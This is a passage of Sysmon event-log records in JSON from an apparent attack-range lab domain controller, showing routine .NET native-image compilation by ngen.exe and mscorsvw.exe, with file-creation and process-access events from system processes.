c|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:39.966\r\nProcessGuid: {E2A3D6B1-1353-5F25-0000-0010922A0E00}\r\nProcessId: 3040\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\be0-0\\System.ComponentModel.Composition.Registration.dll\r\nCreationUtcTime: 2020-08-01 07:01:39.966","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:39.966","ProcessGuid":"{E2A3D6B1-1353-5F25-0000-0010922A0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\be0-0\\System.ComponentModel.Composition.Registration.dll","CreationUtcTime":"2020-08-01 07:01:39.966","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.997\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010222E0E00}\r\nTargetProcessId: 3964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.997","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010222E0E00}","TargetProcessId":"3964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.997\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010222E0E00}\r\nTargetProcessId: 3964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.997","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010222E0E00}","TargetProcessId":"3964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.013\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010222E0E00}\r\nTargetProcessId: 3964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.013","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010222E0E00}","TargetProcessId":"3964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.060\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010A4310E00}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.060","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010A4310E00}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.060\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010A4310E00}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.060","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010A4310E00}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.076\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010A4310E00}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.076","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010A4310E00}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:40.248\r\nProcessGuid: {E2A3D6B1-1354-5F25-0000-0010A4310E00}\r\nProcessId: 5084\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13dc-0\\System.ComponentModel.DataAnnotations.dll\r\nCreationUtcTime: 2020-08-01 07:01:40.248","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:40.248","ProcessGuid":"{E2A3D6B1-1354-5F25-0000-0010A4310E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13dc-0\\System.ComponentModel.DataAnnotations.dll","CreationUtcTime":"2020-08-01 07:01:40.248","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.279\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00103B640D00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.279","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00103B640D00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\